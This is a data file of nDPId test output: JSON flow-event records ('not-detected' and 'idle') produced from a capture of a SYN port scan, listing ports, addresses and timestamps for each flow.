-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 